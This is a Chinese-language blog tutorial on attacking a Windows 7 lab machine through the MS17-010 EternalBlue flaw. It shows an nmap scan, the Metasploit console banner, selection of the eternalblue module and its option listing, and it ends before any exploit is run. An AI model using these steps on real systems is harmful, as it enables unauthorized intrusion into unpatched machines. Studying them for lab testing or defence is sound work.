Kali 笔记

搜索
Kali 笔记 门户 图文快讯 查看内容

kali系统利用ms17_010(永恒之蓝)漏洞渗透攻击windows

2018-9-2 18:21| 发布者: admin| 查看: 2889| 评论: 0

摘要: 测试环境:渗透机:kali 2.0 192.168.1.109靶机:win 7 64位 192.168.1.107利用的漏洞:ms17_010需要用到的工具nmapMetasploit渗透过程:扫描目标机器Bash# nmap -sV 192.168.1.107 Starting Nmap 7.60 ( https://nm ...

测试环境:

渗透机:kali 2.0 192.168.1.109

靶机:win 7 64位 192.168.1.107

利用的漏洞:ms17_010

需要用到的工具

nmap

Metasploit

渗透过程:

扫描目标机器

Bash
# nmap -sV 192.168.1.107
Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-12 21:38 CST
Nmap scan report for 192.168.1.107
Host is up (0.00030s latency).
Not shown: 996 filtered ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5357/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
MAC Address: 00:0C:29:19:6E:B7 (VMware)
Service Info: Host: HUGO-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.45 seconds

kali系统利用ms17_010(永恒之蓝)漏洞渗透攻击windows 渗透测试 第1张

可以看到目标机器135/139/445端口都是开启状态

启动Metasploit控制台

Bash
# msfconsole 
                                                  
                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##
                            https://metasploit.com
       =[ metasploit v4.16.20-dev                         ]
+ -- --=[ 1705 exploits - 970 auxiliary - 299 post        ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >

使用ms17_010漏洞

Bash
msf > use exploit/windows/smb/ms17_010_eternalblue

kali系统利用ms17_010(永恒之蓝)漏洞渗透攻击windows 渗透测试 第2张

查看漏洞配置 

Bash
msf exploit(ms17_010_eternalblue) > show options 
Module options (exploit/windows/smb/ms17_010_eternalblue):
   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.
Exploit target:
   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

kali系统利用ms17_010(永恒之蓝)漏洞渗透攻击windows 渗透测试 第3张

end

Bash

鲜花

握手

雷人

路过

鸡蛋

相关分类

下级分类

返回顶部